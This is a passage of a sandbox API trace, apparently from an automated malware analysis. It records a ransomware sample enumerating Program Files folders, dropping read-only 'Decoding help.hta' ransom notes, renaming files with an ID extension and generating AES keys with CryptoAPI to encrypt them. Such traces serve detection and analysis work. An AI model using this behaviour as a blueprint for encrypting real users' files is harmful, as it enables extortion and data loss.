nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.0", cAlternateFileName="")) returned 1 [0043.341] lstrcmpW (lpString1=".", lpString2="v3.0") returned -1 [0043.341] lstrcmpW (lpString1="..", lpString2="v3.0") returned -1 [0043.341] lstrcmpiW (lpString1="windows", lpString2="v3.0") returned 1 [0043.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0043.341] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned 76 [0043.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\", lpString2="v3.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0" [0043.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0043.341] GlobalMemoryStatus (in: lpBuffer=0x1319fd10 | out: lpBuffer=0x1319fd10) [0043.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1112bae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.360] CloseHandle (hObject=0x708) returned 1 [0043.360] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0043.360] lstrcmpW (lpString1=".", lpString2="v3.5") returned -1 [0043.360] lstrcmpW (lpString1="..", lpString2="v3.5") returned -1 [0043.360] lstrcmpiW (lpString1="windows", lpString2="v3.5") returned 1 [0043.361] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0043.361] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned 76 [0043.361] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\", lpString2="v3.5" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5" [0043.361] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0043.361] GlobalMemoryStatus (in: lpBuffer=0x1319fd10 | out: lpBuffer=0x1319fd10) [0043.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10958800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.386] CloseHandle (hObject=0x708) returned 1 [0043.386] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0043.387] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 382 os_tid = 0xac8 [0043.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*", lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0043.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.376] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.376] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.376] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a8c6329, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a8c6329, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.0", cAlternateFileName="")) returned 1 [0043.376] lstrcmpW (lpString1=".", lpString2="v3.0") returned -1 [0043.376] lstrcmpW (lpString1="..", lpString2="v3.0") returned -1 [0043.376] lstrcmpiW (lpString1="windows", lpString2="v3.0") returned 1 [0043.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0043.376] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned 71 [0043.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\", lpString2="v3.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0043.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0043.376] GlobalMemoryStatus (in: lpBuffer=0x8f4fd10 | out: lpBuffer=0x8f4fd10) [0043.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110b38d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a4 [0043.423] CloseHandle (hObject=0x6a4) returned 1 [0043.423] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a23a69d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a23a69d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0043.423] lstrcmpW (lpString1=".", lpString2="v3.5") returned -1 [0043.423] lstrcmpW (lpString1="..", lpString2="v3.5") returned -1 [0043.423] lstrcmpiW (lpString1="windows", lpString2="v3.5") returned 1 [0043.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0043.423] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned 71 [0043.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\", lpString2="v3.5" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0043.424] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0043.424] GlobalMemoryStatus (in: lpBuffer=0x8f4fd10 | out: lpBuffer=0x8f4fd10) [0043.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110cb940, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a4 [0043.443] CloseHandle (hObject=0x6a4) returned 1 [0043.443] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a23a69d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a23a69d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0043.443] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 383 os_tid = 0x184 [0043.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*", lpFindFileData=0x1599fd30 | out: lpFindFileData=0x1599fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xcc379b80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xcc379b80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da2f8 [0043.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.845] FindNextFileW (in: hFindFile=0x5da2f8, lpFindFileData=0x1599fd30 | out: lpFindFileData=0x1599fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xcc379b80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xcc379b80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.845] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.845] FindNextFileW (in: hFindFile=0x5da2f8, lpFindFileData=0x1599fd30 | out: lpFindFileData=0x1599fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e46d20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xa3e46d20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa3e46d20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="amd64", cAlternateFileName="")) returned 1 [0043.845] lstrcmpW (lpString1=".", lpString2="amd64") returned -1 [0043.845] lstrcmpW (lpString1="..", lpString2="amd64") returned -1 [0043.845] lstrcmpiW (lpString1="windows", lpString2="amd64") returned 1 [0043.845] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" [0043.845] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned 63 [0043.845] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\", lpString2="amd64" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" [0043.845] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*" [0043.845] GlobalMemoryStatus (in: lpBuffer=0x1599fd10 | out: lpBuffer=0x1599fd10) [0043.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9641e20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0044.105] CloseHandle (hObject=0x260) returned 1 [0044.105] FindNextFileW (in: hFindFile=0x5da2f8, lpFindFileData=0x1599fd30 | out: lpFindFileData=0x1599fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdca800, ftCreationTime.dwHighDateTime=0x1cbd035, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x5cdca800, ftLastWriteTime.dwHighDateTime=0x1cbd035, nFileSizeHigh=0x0, nFileSizeLow=0xc3350, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0047.056] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" [0047.057] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned 63 [0047.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\Decoding help.hta" [0047.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\decoding help.hta")) returned 0xffffffff [0047.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.057] WriteFile (in: hFile=0x328, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1599fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1599fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0047.607] CloseHandle (hObject=0x328) returned 1 [0050.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0053.650] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdia100.dll") returned -1 [0053.650] lstrlenW (lpString="msdia100.dll") returned 12 [0053.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" [0053.650] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned 63 [0053.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\", lpString2="msdia100.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" [0053.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" [0053.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0058.284] CreateFileMappingA (hFile=0x3f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa5c [0058.284] CryptAcquireContextA (in: phProv=0x1599fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1599fcec*=0x3448940) returned 1 [0060.192] CryptGenKey (in: hProv=0x3448940, Algid=0x6610, dwFlags=0x1, phKey=0x1599fce8 | out: phKey=0x1599fce8*=0x42cf5d8) returned 1 [0060.192] CryptExportKey (in: hKey=0x42cf5d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1599fbe4, pdwDataLen=0x1599fce4 | out: pbData=0x1599fbe4*, pdwDataLen=0x1599fce4*=0x2c) returned 1 [0060.192] MapViewOfFile (hFileMappingObject=0xa5c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc3340) Thread: id = 384 os_tid = 0xad0 [0043.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*", lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da5b8 [0043.863] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.863] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.863] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.863] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.863] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0043.863] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0043.863] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0043.863] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0044.192] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0044.192] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0044.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033" [0044.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0044.192] GlobalMemoryStatus (in: lpBuffer=0x9c4fd10 | out: lpBuffer=0x9c4fd10) [0044.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f573e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0044.205] CloseHandle (hObject=0x724) returned 1 [0044.205] FindNextFileW (in: hFindFile=0x5da5b8, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x1e380, dwReserved0=0x0, dwReserved1=0x0, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0044.205] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0044.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned 64 [0044.205] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" [0044.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\decoding help.hta")) returned 0xffffffff [0044.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x724 [0044.206] WriteFile (in: hFile=0x724, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9c4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.206] CloseHandle (hObject=0x724) returned 1 [0044.207] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FBIBLIO.DLL") returned -1 [0044.207] lstrlenW (lpString="FBIBLIO.DLL") returned 11 [0044.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common 